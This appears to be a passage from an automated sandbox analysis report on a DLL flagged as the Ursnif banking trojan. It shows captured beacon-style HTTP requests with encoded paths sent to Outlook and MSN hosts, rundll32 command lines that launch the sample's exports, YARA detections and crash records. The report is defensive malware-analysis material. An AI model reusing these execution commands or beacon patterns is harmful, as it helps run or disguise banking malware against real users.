                                                                                                                                  2021-10-11 22:23:43 UTC | 4 | OUT | GET /signup/liopolo/_2F1953bLKh6Aa9Zni5pUB/uu476XRXRXdwS/zStiAL1i/ws5BIrlWLA2GdJ9e0xq88Zi/DBztcvZHmo/mcGQqmXKrqNjP4iG6/7aTDT9GSE9D6/8jXJ0EFBBnJ/89lvGSm0UsN_2B/DpWUyWVECg62e9A86zQtW/yv5TQxo2fX2Xv7gp/5xHugEiGC5l_2Bc/jIp0JWV7N33_2F/EkcA.jre HTTP/1.1
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Pragma: no-cache
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                  Host: outlook.office365.com
                                                                                                                                  2021-10-11 22:23:43 UTC | 5 | IN | HTTP/1.1 404 Not Found
                                                                                                                                  Content-Length: 1245
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Server: Microsoft-IIS/10.0
                                                                                                                                  request-id: 0c8d249e-2aa6-4c4b-c0dd-a86db3f73cbe
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  X-CalculatedFETarget: AM0PR02CU003.internal.outlook.com
                                                                                                                                  X-BackEndHttpStatus: 404
                                                                                                                                  X-FEProxyInfo: AM0PR02CA0079.EURPRD02.PROD.OUTLOOK.COM
                                                                                                                                  X-CalculatedBETarget: AM0PR10MB2530.EURPRD10.PROD.OUTLOOK.COM
                                                                                                                                  X-BackEndHttpStatus: 404
                                                                                                                                  X-RUM-Validated: 1
                                                                                                                                  X-Proxy-RoutingCorrectness: 1
                                                                                                                                  X-Proxy-BackendServerStatus: 404
                                                                                                                                  MS-CV: niSNDKYqS0zA3ahts/c8vg.1.1
                                                                                                                                  X-FEServer: AM0PR02CA0079
                                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                                  X-FEServer: AM6PR10CA0074
                                                                                                                                  Date: Mon, 11 Oct 2021 22:23:43 GMT
                                                                                                                                  Connection: close
                                                                                                                                  2021-10-11 22:23:43 UTC | 6 | IN | Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                  5 | 192.168.2.3 | 49796 | 40.97.161.50 | 443 | C:\Windows\System32\loaddll32.exe
                                                                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                                                                  2021-10-11 22:23:44 UTC | 7 | OUT | GET /signup/liopolo/jh_2BJAUni/lkDaKSs6NPU7K6NDS/e_2FibHZsZ5a/s4oEo9go0c6/pciek84ucCmHqd/ux_2BgaSfPaBMcDfNjzb3/rbrRSArhJJpb3rOW/xdA1Wy83LoKT_2F/eny3XPOONMNlhwdGDb/HeEQC75Ox/PYv0ijHf_2BV06O4iZeM/ZM8mz_2FbpTp5AwODR0/XLpKCg0_2Ffc7auFjvx4p8/3b.jre HTTP/1.1
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Pragma: no-cache
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                  Host: outlook.com
                                                                                                                                  2021-10-11 22:23:44 UTC | 7 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  Location: https://www.outlook.com/signup/liopolo/jh_2BJAUni/lkDaKSs6NPU7K6NDS/e_2FibHZsZ5a/s4oEo9go0c6/pciek84ucCmHqd/ux_2BgaSfPaBMcDfNjzb3/rbrRSArhJJpb3rOW/xdA1Wy83LoKT_2F/eny3XPOONMNlhwdGDb/HeEQC75Ox/PYv0ijHf_2BV06O4iZeM/ZM8mz_2FbpTp5AwODR0/XLpKCg0_2Ffc7auFjvx4p8/3b.jre
                                                                                                                                  Server: Microsoft-IIS/10.0
                                                                                                                                  request-id: 7476278a-8573-403d-bda4-a5e2da3086ad
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  X-FEServer: MWHPR11CA0027
                                                                                                                                  X-RequestId: 8c7971ac-3435-454b-9ce5-da2c04cd34f2
                                                                                                                                  MS-CV: iid2dHOFPUC9pKXi2jCGrQ.0
                                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                                  X-FEServer: MWHPR11CA0027
                                                                                                                                  Date: Mon, 11 Oct 2021 22:23:44 GMT
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 0


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                  6 | 192.168.2.3 | 49797 | 52.97.151.2 | 443 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                                                                  2021-10-11 22:23:44 UTC | 8 | OUT | GET /signup/liopolo/jh_2BJAUni/lkDaKSs6NPU7K6NDS/e_2FibHZsZ5a/s4oEo9go0c6/pciek84ucCmHqd/ux_2BgaSfPaBMcDfNjzb3/rbrRSArhJJpb3rOW/xdA1Wy83LoKT_2F/eny3XPOONMNlhwdGDb/HeEQC75Ox/PYv0ijHf_2BV06O4iZeM/ZM8mz_2FbpTp5AwODR0/XLpKCg0_2Ffc7auFjvx4p8/3b.jre HTTP/1.1
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Pragma: no-cache
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                  Host: www.outlook.com
                                                                                                                                  2021-10-11 22:23:44 UTC | 8 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  Location: https://outlook.office365.com/signup/liopolo/jh_2BJAUni/lkDaKSs6NPU7K6NDS/e_2FibHZsZ5a/s4oEo9go0c6/pciek84ucCmHqd/ux_2BgaSfPaBMcDfNjzb3/rbrRSArhJJpb3rOW/xdA1Wy83LoKT_2F/eny3XPOONMNlhwdGDb/HeEQC75Ox/PYv0ijHf_2BV06O4iZeM/ZM8mz_2FbpTp5AwODR0/XLpKCg0_2Ffc7auFjvx4p8/3b.jre
                                                                                                                                  Server: Microsoft-IIS/10.0
                                                                                                                                  request-id: caa0db0f-9777-d9d1-3336-962544cc6f5d
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  X-FEServer: AM6P195CA0043
                                                                                                                                  X-RequestId: d14c0c8b-35f7-4987-9d6d-c2fe1a7d1a5a
                                                                                                                                  MS-CV: D9ugyneX0dkzNpYlRMxvXQ.0
                                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                                  X-FEServer: AM6P195CA0043
                                                                                                                                  Date: Mon, 11 Oct 2021 22:23:44 GMT
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 0


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                  7 | 192.168.2.3 | 49798 | 52.97.151.66 | 443 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                                                                  2021-10-11 22:23:44 UTC | 9 | OUT | GET /signup/liopolo/jh_2BJAUni/lkDaKSs6NPU7K6NDS/e_2FibHZsZ5a/s4oEo9go0c6/pciek84ucCmHqd/ux_2BgaSfPaBMcDfNjzb3/rbrRSArhJJpb3rOW/xdA1Wy83LoKT_2F/eny3XPOONMNlhwdGDb/HeEQC75Ox/PYv0ijHf_2BV06O4iZeM/ZM8mz_2FbpTp5AwODR0/XLpKCg0_2Ffc7auFjvx4p8/3b.jre HTTP/1.1
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Pragma: no-cache
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                  Host: outlook.office365.com
                                                                                                                                  2021-10-11 22:23:44 UTC | 9 | IN | HTTP/1.1 404 Not Found
                                                                                                                                  Content-Length: 1245
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Server: Microsoft-IIS/10.0
                                                                                                                                  request-id: 404aa930-782f-c767-6fa8-22dabae1af7b
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Alt-Svc: h3=":443",h3-29=":443"
                                                                                                                                  X-CalculatedFETarget: VI1PR04CU006.internal.outlook.com
                                                                                                                                  X-BackEndHttpStatus: 404
                                                                                                                                  X-FEProxyInfo: VI1PR04CA0106.EURPRD04.PROD.OUTLOOK.COM
                                                                                                                                  X-CalculatedBETarget: VI1P191MB0174.EURP191.PROD.OUTLOOK.COM
                                                                                                                                  X-BackEndHttpStatus: 404
                                                                                                                                  X-RUM-Validated: 1
                                                                                                                                  X-Proxy-RoutingCorrectness: 1
                                                                                                                                  X-Proxy-BackendServerStatus: 404
                                                                                                                                  MS-CV: MKlKQC94Z8dvqCLauuGvew.1.1
                                                                                                                                  X-FEServer: VI1PR04CA0106
                                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                                  X-FEServer: AM6P191CA0036
                                                                                                                                  Date: Mon, 11 Oct 2021 22:23:43 GMT
                                                                                                                                  Connection: close
                                                                                                                                  2021-10-11 22:23:44 UTC | 10 | IN | Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                  8 | 192.168.2.3 | 49846 | 13.82.28.61 | 443 | C:\Windows\System32\loaddll32.exe
                                                                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                                                                  2021-10-11 22:24:23 UTC | 11 | OUT | GET /mail/liopolo/jpKr3VzL6CFU/K4QwQLlZ56e/n3MZDuNS62Sf0R/mD2lfs_2FQXwlgYrd0DFL/pEDSMAvGReZoZ8Jm/OSgzsTstfQRz_2F/2Bp8zA9yijiTKRH09Q/Mwm_2F7JH/xI5SfnAXURadBpSsyjtC/_2BEE4TT4VBjXUCp_2B/cYd5vNurcHADHrS6HheJd6/UAnImB8Jw2Ynr/9pKHwbRP/FStf.jre HTTP/1.1
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Pragma: no-cache
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                  Host: msn.com
                                                                                                                                  2021-10-11 22:24:23 UTC12INHTTP/1.1 301 Moved Permanently
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Location: https://www.msn.com/mail/liopolo/jpKr3VzL6CFU/K4QwQLlZ56e/n3MZDuNS62Sf0R/mD2lfs_2FQXwlgYrd0DFL/pEDSMAvGReZoZ8Jm/OSgzsTstfQRz_2F/2Bp8zA9yijiTKRH09Q/Mwm_2F7JH/xI5SfnAXURadBpSsyjtC/_2BEE4TT4VBjXUCp_2B/cYd5vNurcHADHrS6HheJd6/UAnImB8Jw2Ynr/9pKHwbRP/FStf.jre
                                                                                                                                  Server: Microsoft-IIS/8.5
                                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Date: Mon, 11 Oct 2021 22:24:23 GMT
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 375
                                                                                                                                  2021-10-11 22:24:23 UTC12INData Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 73 6e 2e 63 6f 6d 2f 6d 61 69 6c 2f 6c 69 6f 70 6f 6c 6f 2f 6a 70 4b 72 33 56 7a 4c 36 43 46 55 2f 4b 34 51 77 51 4c 6c 5a 35 36 65 2f 6e 33 4d 5a 44 75 4e 53 36 32 53 66 30 52 2f 6d 44 32 6c 66 73 5f 32 46 51 58 77 6c 67 59 72 64 30 44 46 4c 2f 70 45 44 53 4d 41 76 47 52 65 5a 6f 5a 38 4a 6d 2f 4f 53 67 7a 73 54 73 74 66 51 52 7a 5f 32 46 2f 32 42 70 38 7a 41 39 79 69 6a 69 54 4b 52 48 30 39 51 2f 4d 77
                                                                                                                                  Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/jpKr3VzL6CFU/K4QwQLlZ56e/n3MZDuNS62Sf0R/mD2lfs_2FQXwlgYrd0DFL/pEDSMAvGReZoZ8Jm/OSgzsTstfQRz_2F/2Bp8zA9yijiTKRH09Q/Mw


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
9          | 192.168.2.3 | 49848       | 13.82.28.61    | 443              | C:\Windows\System32\loaddll32.exe

Timestamp: 2021-10-11 22:24:25 UTC | kBytes transferred: 13 | Direction: OUT
GET /mail/liopolo/QXqV1Cwmdgy9RAxuvo/eyRDOSF4h/n5Xdvl6macAzIHUi6g_2/FnMxm3OFSbW9k15b3rD/GOZ7HTzmadDT3EaU6FMaux/8v8OfzSGDIfuI/2JFzbGpa/48oXcRIDJ4CWvryCIOce07l/PRm5ekLf_2/FWrUO776bg5a24LJQ/ndIkg4SZse4c/jL7OG2Z00xG/sTPur68E_2BxS_/2FjGzTP4SxNpm_2FiKI7j/WPoFKl4.jre HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: msn.com

Timestamp: 2021-10-11 22:24:25 UTC | kBytes transferred: 13 | Direction: IN
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: https://www.msn.com/mail/liopolo/QXqV1Cwmdgy9RAxuvo/eyRDOSF4h/n5Xdvl6macAzIHUi6g_2/FnMxm3OFSbW9k15b3rD/GOZ7HTzmadDT3EaU6FMaux/8v8OfzSGDIfuI/2JFzbGpa/48oXcRIDJ4CWvryCIOce07l/PRm5ekLf_2/FWrUO776bg5a24LJQ/ndIkg4SZse4c/jL7OG2Z00xG/sTPur68E_2BxS_/2FjGzTP4SxNpm_2FiKI7j/WPoFKl4.jre
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Date: Mon, 11 Oct 2021 22:24:25 GMT
Connection: close
Content-Length: 398

Timestamp: 2021-10-11 22:24:25 UTC | kBytes transferred: 14 | Direction: IN
Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 73 6e 2e 63 6f 6d 2f 6d 61 69 6c 2f 6c 69 6f 70 6f 6c 6f 2f 51 58 71 56 31 43 77 6d 64 67 79 39 52 41 78 75 76 6f 2f 65 79 52 44 4f 53 46 34 68 2f 6e 35 58 64 76 6c 36 6d 61 63 41 7a 49 48 55 69 36 67 5f 32 2f 46 6e 4d 78 6d 33 4f 46 53 62 57 39 6b 31 35 62 33 72 44 2f 47 4f 5a 37 48 54 7a 6d 61 64 44 54 33 45 61 55 36 46 4d 61 75 78 2f 38 76 38 4f 66 7a 53 47 44 49 66 75 49 2f 32 4a 46 7a 62 47 70 61 2f
Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/QXqV1Cwmdgy9RAxuvo/eyRDOSF4h/n5Xdvl6macAzIHUi6g_2/FnMxm3OFSbW9k15b3rD/GOZ7HTzmadDT3EaU6FMaux/8v8OfzSGDIfuI/2JFzbGpa/


                                                                                                                                  Code Manipulations

                                                                                                                                  Statistics

                                                                                                                                  Behavior

                                                                                                                                  System Behavior

                                                                                                                                  General

                                                                                                                                  Start time:00:20:49
                                                                                                                                  Start date:12/10/2021
                                                                                                                                  Path:C:\Windows\System32\loaddll32.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:loaddll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll'
                                                                                                                                  Imagebase:0x1240000
                                                                                                                                  File size:893440 bytes
                                                                                                                                  MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.828285916.0000000002F19000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.573182276.00000000034C8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.575886663.00000000034C8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.512556680.0000000000D50000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.574590732.00000000034C8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.573615076.00000000034C8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.828440646.00000000030D0000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.574198555.00000000034C8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.573998703.00000000034C8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.619056224.000000000334B000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.573750690.00000000034C8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.573091337.00000000034C8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.707612619.000000000314F000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.574533141.00000000034C8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.664577952.000000000324D000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  Reputation:moderate

                                                                                                                                  General

                                                                                                                                  Start time:00:20:50
                                                                                                                                  Start date:12/10/2021
                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll',#1
                                                                                                                                  Imagebase:0xd80000
                                                                                                                                  File size:232960 bytes
                                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  General

                                                                                                                                  Start time:00:20:50
                                                                                                                                  Start date:12/10/2021
                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,BeGrass
                                                                                                                                  Imagebase:0xa10000
                                                                                                                                  File size:61952 bytes
                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.492790466.0000000002F30000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  Reputation:high

                                                                                                                                  General

                                                                                                                                  Start time:00:20:50
                                                                                                                                  Start date:12/10/2021
                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:rundll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll',#1
                                                                                                                                  Imagebase:0xa10000
                                                                                                                                  File size:61952 bytes
                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.829711196.0000000004CD0000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.577592974.00000000050C8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.577142287.00000000050C8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.621678183.0000000004F4B000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.492597168.00000000008D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.829472336.0000000004949000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.576726243.00000000050C8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.577395162.00000000050C8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.578289206.00000000050C8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.576921901.00000000050C8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.711256543.0000000004D4F000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.576829931.00000000050C8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.667981816.0000000004E4D000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.577047375.00000000050C8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.576567742.00000000050C8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                  Reputation:high

                                                                                                                                  General

                                                                                                                                  Start time:00:20:55
                                                                                                                                  Start date:12/10/2021
                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,Fieldeight
                                                                                                                                  Imagebase:0xa10000
                                                                                                                                  File size:61952 bytes
                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000003.506220086.0000000000680000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  Reputation:high

                                                                                                                                  General

                                                                                                                                  Start time:00:20:59
                                                                                                                                  Start date:12/10/2021
                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  Wow64 process (32bit):true
Commandline: rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,Often
Imagebase: 0xa10000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000003.512003320.00000000004D0000.00000040.00000001.sdmp, Author: Joe Security
Reputation: high

General

Start time: 00:22:47
Start date: 12/10/2021
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 4520 -s 876
Imagebase: 0xd50000
File size: 434592 bytes
MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 00:22:50
Start date: 12/10/2021
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 6936 -s 832
Imagebase: 0xd50000
File size: 434592 bytes
MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 00:22:56
Start date: 12/10/2021
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 6952 -s 640
Imagebase: 0xd50000
File size: 434592 bytes
MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 00:23:01
Start date: 12/10/2021
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 6952 -s 640
Imagebase: 0xd50000
File size: 434592 bytes
MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Disassembly

Code Analysis
